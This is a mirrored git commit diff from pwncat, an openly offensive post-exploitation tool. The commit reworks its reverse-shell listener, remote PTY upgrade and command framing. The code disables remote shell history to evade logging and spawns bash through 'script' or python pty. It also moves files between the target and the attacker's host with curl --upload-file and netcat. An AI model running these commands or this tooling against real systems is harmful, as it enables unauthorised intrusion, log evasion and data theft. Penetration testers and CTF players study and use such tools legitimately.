mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-30 20:34:15 +01:00
Improved initial state processing to account for different types of terminals.
This commit is contained in:
parent
c01476f7ae
commit
a3e1469085
@ -54,6 +54,7 @@ def main():
|
|||||||
# Listen on a socket for connections
|
# Listen on a socket for connections
|
||||||
util.info(f"binding to {args.host}:{args.port}", overlay=True)
|
util.info(f"binding to {args.host}:{args.port}", overlay=True)
|
||||||
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||||
server.bind((args.host, args.port))
|
server.bind((args.host, args.port))
|
||||||
# After the first connection, drop further attempts
|
# After the first connection, drop further attempts
|
||||||
server.listen(1)
|
server.listen(1)
|
||||||
|
@ -18,4 +18,6 @@ class CurlDownloader(HTTPDownloader):
|
|||||||
curl = self.pty.which("curl")
|
curl = self.pty.which("curl")
|
||||||
remote_path = shlex.quote(self.remote_path)
|
remote_path = shlex.quote(self.remote_path)
|
||||||
|
|
||||||
self.pty.run(f"{curl} --upload-file {remote_path} http://{lhost}:{lport}")
|
self.pty.run(
|
||||||
|
f"{curl} --upload-file {remote_path} http://{lhost}:{lport}", wait=False
|
||||||
|
)
|
||||||
|
@ -18,4 +18,4 @@ class NetcatDownloader(RawDownloader):
|
|||||||
nc = self.pty.which("nc")
|
nc = self.pty.which("nc")
|
||||||
remote_file = shlex.quote(self.remote_path)
|
remote_file = shlex.quote(self.remote_path)
|
||||||
|
|
||||||
self.pty.run(f"{nc} -q0 {lhost} {lport} < {remote_file}")
|
self.pty.run(f"{nc} -q0 {lhost} {lport} < {remote_file}", wait=False)
|
||||||
|
136
pwncat/pty.py
136
pwncat/pty.py
@ -1,5 +1,5 @@
|
|||||||
#!/usr/bin/env python3
|
#!/usr/bin/env python3
|
||||||
from prompt_toolkit import prompt, PromptSession, ANSI
|
from prompt_toolkit import PromptSession, ANSI
|
||||||
from prompt_toolkit.shortcuts import ProgressBar
|
from prompt_toolkit.shortcuts import ProgressBar
|
||||||
import subprocess
|
import subprocess
|
||||||
import logging
|
import logging
|
||||||
@ -30,8 +30,8 @@ class PtyHandler:
|
|||||||
on the local end """
|
on the local end """
|
||||||
|
|
||||||
OPEN_METHODS = {
|
OPEN_METHODS = {
|
||||||
"script": "exec {} -qc /bin/bash /dev/null",
|
"script": "exec {} -qc /bin/bash /dev/null 2>&1",
|
||||||
"python": "exec {} -c \"import pty; pty.spawn('/bin/bash')\"",
|
"python": "exec {} -c \"import pty; pty.spawn('/bin/bash')\" 2>&1",
|
||||||
}
|
}
|
||||||
|
|
||||||
INTERESTING_BINARIES = [
|
INTERESTING_BINARIES = [
|
||||||
@ -63,7 +63,7 @@ class PtyHandler:
|
|||||||
self.lhost = None
|
self.lhost = None
|
||||||
self.known_binaries = {}
|
self.known_binaries = {}
|
||||||
self.vars = {"lhost": util.get_ip_addr()}
|
self.vars = {"lhost": util.get_ip_addr()}
|
||||||
self.remote_prompt = b"\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$"
|
self.remote_prompt = "\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$"
|
||||||
self.prompt = PromptSession(
|
self.prompt = PromptSession(
|
||||||
[("", "(local) "), ("#ff0000", "pwncat"), ("", "$ ")]
|
[("", "(local) "), ("#ff0000", "pwncat"), ("", "$ ")]
|
||||||
)
|
)
|
||||||
@ -83,15 +83,58 @@ class PtyHandler:
|
|||||||
# We should always get a response within 3 seconds...
|
# We should always get a response within 3 seconds...
|
||||||
self.client.settimeout(3)
|
self.client.settimeout(3)
|
||||||
|
|
||||||
# Ensure history is disabled
|
util.info("probing for prompt...", overlay=False)
|
||||||
util.info("disabling remote command history", overlay=True)
|
start = time.time()
|
||||||
client.sendall(b"unset HISTFILE\n")
|
prompt = b""
|
||||||
|
try:
|
||||||
|
while time.time() < (start + 0.1):
|
||||||
|
prompt += self.client.recv(1)
|
||||||
|
except socket.timeout:
|
||||||
|
pass
|
||||||
|
|
||||||
|
# We assume if we got data before sending data, there is a prompt
|
||||||
|
if prompt != b"":
|
||||||
|
self.has_prompt = True
|
||||||
|
util.info(f"found a prompt", overlay=True)
|
||||||
|
else:
|
||||||
|
self.has_prompt = False
|
||||||
|
util.info("no prompt observed", overlay=True)
|
||||||
|
|
||||||
|
# Send commands without a new line, and see if the characters are echoed
|
||||||
|
util.info("checking for echoing", overlay=True)
|
||||||
|
self.client.send(b"echo")
|
||||||
|
response = b""
|
||||||
|
|
||||||
|
try:
|
||||||
|
while len(response) < 7:
|
||||||
|
response += self.client.recv(7 - len(response))
|
||||||
|
except socket.timeout:
|
||||||
|
pass
|
||||||
|
|
||||||
|
if response == b"echo":
|
||||||
|
self.has_echo = True
|
||||||
|
util.info("found input echo", overlay=True)
|
||||||
|
else:
|
||||||
|
self.has_echo = False
|
||||||
|
util.info(f"no echo observed", overlay=True)
|
||||||
|
|
||||||
|
self.client.send(b"\n")
|
||||||
|
response = self.client.recv(1)
|
||||||
|
if response == "\r":
|
||||||
|
self.client.recv(1)
|
||||||
|
self.has_cr = True
|
||||||
|
else:
|
||||||
|
self.has_cr = False
|
||||||
|
|
||||||
|
if self.has_echo:
|
||||||
self.recvuntil(b"\n")
|
self.recvuntil(b"\n")
|
||||||
|
|
||||||
|
# Ensure history is disabled
|
||||||
|
util.info("disabling remote command history", overlay=True)
|
||||||
|
self.run("unset HISTFILE")
|
||||||
|
|
||||||
util.info("setting terminal prompt", overlay=True)
|
util.info("setting terminal prompt", overlay=True)
|
||||||
client.sendall(b'export PS1="(remote) %b "\n\n' % self.remote_prompt)
|
self.run(f'export PS1="(remote) {self.remote_prompt} "')
|
||||||
self.recvuntil(b"\n")
|
|
||||||
self.recvuntil(b"\n")
|
|
||||||
|
|
||||||
# Locate interesting binaries
|
# Locate interesting binaries
|
||||||
# The auto-resolving doesn't work correctly until we have a pty
|
# The auto-resolving doesn't work correctly until we have a pty
|
||||||
@ -104,7 +147,7 @@ class PtyHandler:
|
|||||||
)
|
)
|
||||||
|
|
||||||
# Look for the given binary
|
# Look for the given binary
|
||||||
response = self.run(f"which {shlex.quote(name)}", has_pty=False)
|
response = self.run(f"which {shlex.quote(name)}").strip()
|
||||||
if response == b"":
|
if response == b"":
|
||||||
continue
|
continue
|
||||||
|
|
||||||
@ -125,12 +168,16 @@ class PtyHandler:
|
|||||||
util.info(
|
util.info(
|
||||||
f"opening pseudoterminal via {Fore.GREEN}{method}{Fore.RESET}", overlay=True
|
f"opening pseudoterminal via {Fore.GREEN}{method}{Fore.RESET}", overlay=True
|
||||||
)
|
)
|
||||||
client.sendall(method_cmd.encode("utf-8") + b"\n")
|
self.run(method_cmd, wait=False)
|
||||||
|
# client.sendall(method_cmd.encode("utf-8") + b"\n")
|
||||||
|
|
||||||
|
# We just started a PTY, so we now have all three
|
||||||
|
self.has_echo = True
|
||||||
|
self.has_cr = True
|
||||||
|
self.has_prompt = True
|
||||||
|
|
||||||
util.info("setting terminal prompt", overlay=True)
|
util.info("setting terminal prompt", overlay=True)
|
||||||
client.sendall(b'export PS1="(remote) %b "\r' % self.remote_prompt)
|
self.run(f'export PS1="(remote) {self.remote_prompt} "')
|
||||||
self.recvuntil(b"\r\n")
|
|
||||||
self.recvuntil(b"\r\n")
|
|
||||||
|
|
||||||
# Make sure HISTFILE is unset in this PTY (it resets when a pty is
|
# Make sure HISTFILE is unset in this PTY (it resets when a pty is
|
||||||
# opened)
|
# opened)
|
||||||
@ -459,50 +506,32 @@ class PtyHandler:
|
|||||||
|
|
||||||
EOL = b"\r" if has_pty else b"\n"
|
EOL = b"\r" if has_pty else b"\n"
|
||||||
|
|
||||||
# Read until there's no more data in the queue
|
if wait:
|
||||||
# This works by waiting for our known prompt
|
command = f"echo _PWNCAT_DELIM_; {cmd}; echo _PWNCAT_DELIM_"
|
||||||
self.recvuntil(b"(remote) ")
|
else:
|
||||||
try:
|
command = cmd
|
||||||
# Read to the end of the prompt
|
|
||||||
self.recvuntil(b"$ ", socket.MSG_DONTWAIT)
|
response = b""
|
||||||
except BlockingIOError:
|
|
||||||
# The prompt may be "#"
|
|
||||||
try:
|
|
||||||
self.recvuntil(b"# ", socket.MSG_DONTWAIT)
|
|
||||||
except BlockingIOError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
# Send the command to the remote host
|
# Send the command to the remote host
|
||||||
self.client.send(cmd.encode("utf-8") + EOL)
|
self.client.send(command.encode("utf-8") + b"\n")
|
||||||
|
|
||||||
# Initialize response buffer
|
|
||||||
response = b""
|
|
||||||
peek_len = 4096
|
|
||||||
|
|
||||||
# Look for the next prompt in the output and leave it in the buffer
|
|
||||||
if wait:
|
if wait:
|
||||||
while True:
|
if self.has_echo:
|
||||||
data = self.client.recv(peek_len, socket.MSG_PEEK)
|
self.recvuntil(b"_PWNCAT_DELIM_") # first in command
|
||||||
if b"(remote) " in data:
|
self.recvuntil(b"_PWNCAT_DELIM_") # second in command
|
||||||
response = data.split(b"(remote) ")[0]
|
# Recieve line ending from output
|
||||||
self.client.recv(len(response))
|
self.recvuntil(b"\n")
|
||||||
break
|
|
||||||
if len(data) == peek_len:
|
|
||||||
peek_len += 4096
|
|
||||||
|
|
||||||
# The echoed input command is currently in the output
|
self.recvuntil(b"_PWNCAT_DELIM_") # first in output
|
||||||
if has_pty:
|
self.recvuntil(b"\n")
|
||||||
response = b"".join(response.split(b"\r\n")[1:])
|
response = self.recvuntil(b"_PWNCAT_DELIM_")
|
||||||
|
response = response.split(b"_PWNCAT_DELIM_")[0]
|
||||||
|
|
||||||
|
if self.has_cr:
|
||||||
|
self.recvuntil(b"\r\n")
|
||||||
else:
|
else:
|
||||||
response = b"".join(response.split(b"\n")[1:])
|
self.recvuntil(b"\n")
|
||||||
|
|
||||||
# Bash sends these escape sequences for some reason, and it fucks up
|
|
||||||
# the output
|
|
||||||
while b"\x1b_" in response:
|
|
||||||
response = response.split(b"\x1b_")
|
|
||||||
before = response[0]
|
|
||||||
after = b"\x1b_".join(response[1:])
|
|
||||||
response = before + b"\x1b\\".join(after.split(b"\x1b\\")[1])
|
|
||||||
|
|
||||||
return response
|
return response
|
||||||
|
|
||||||
@ -512,7 +541,6 @@ class PtyHandler:
|
|||||||
result = b""
|
result = b""
|
||||||
while not result.endswith(needle):
|
while not result.endswith(needle):
|
||||||
result += self.client.recv(1, flags)
|
result += self.client.recv(1, flags)
|
||||||
# print(result)
|
|
||||||
|
|
||||||
return result
|
return result
|
||||||
|
|
||||||
|
@ -82,6 +82,7 @@ class HTTPUploader(Uploader):
|
|||||||
|
|
||||||
@classmethod
|
@classmethod
|
||||||
def check(cls, pty: "pwncat.pty.PtyHandler") -> bool:
|
def check(cls, pty: "pwncat.pty.PtyHandler") -> bool:
|
||||||
|
super(HTTPUploader, cls).check(pty)
|
||||||
""" Make sure we have an lhost """
|
""" Make sure we have an lhost """
|
||||||
if pty.vars.get("lhost", None) is None:
|
if pty.vars.get("lhost", None) is None:
|
||||||
raise UploadError("no lhost provided")
|
raise UploadError("no lhost provided")
|
||||||
@ -115,6 +116,7 @@ class RawUploader(Uploader):
|
|||||||
|
|
||||||
@classmethod
|
@classmethod
|
||||||
def check(cls, pty: "pwncat.pty.PtyHandler") -> bool:
|
def check(cls, pty: "pwncat.pty.PtyHandler") -> bool:
|
||||||
|
super(RawUploader, cls).check(pty)
|
||||||
""" Make sure we have an lhost """
|
""" Make sure we have an lhost """
|
||||||
if pty.vars.get("lhost", None) is None:
|
if pty.vars.get("lhost", None) is None:
|
||||||
raise UploadError("no lhost provided")
|
raise UploadError("no lhost provided")
|
||||||
|
@ -18,4 +18,6 @@ class CurlUploader(HTTPUploader):
|
|||||||
curl = self.pty.which("curl")
|
curl = self.pty.which("curl")
|
||||||
remote_path = shlex.quote(self.remote_path)
|
remote_path = shlex.quote(self.remote_path)
|
||||||
|
|
||||||
self.pty.run(f"{curl} --output {remote_path} http://{lhost}:{lport}")
|
self.pty.run(
|
||||||
|
f"{curl} --output {remote_path} http://{lhost}:{lport}", wait=False
|
||||||
|
)
|
||||||
|
@ -18,4 +18,4 @@ class NetcatUploader(RawUploader):
|
|||||||
nc = self.pty.which("nc")
|
nc = self.pty.which("nc")
|
||||||
remote_file = shlex.quote(self.remote_path)
|
remote_file = shlex.quote(self.remote_path)
|
||||||
|
|
||||||
self.pty.run(f"{nc} -w 0 {lhost} {lport} > {remote_file}")
|
self.pty.run(f"{nc} {lhost} {lport} > {remote_file}", wait=False)
|
||||||
|
@ -122,7 +122,6 @@ def get_ip_addr() -> str:
|
|||||||
for iface in ifaces:
|
for iface in ifaces:
|
||||||
if iface.startswith("tun") or iface.startswith("tap"):
|
if iface.startswith("tun") or iface.startswith("tap"):
|
||||||
addrs = netifaces.ifaddresses(iface)
|
addrs = netifaces.ifaddresses(iface)
|
||||||
print(addrs)
|
|
||||||
if PROTO not in addrs:
|
if PROTO not in addrs:
|
||||||
continue
|
continue
|
||||||
for a in addrs[PROTO]:
|
for a in addrs[PROTO]:
|
||||||
|
Loading…
Reference in New Issue
Block a user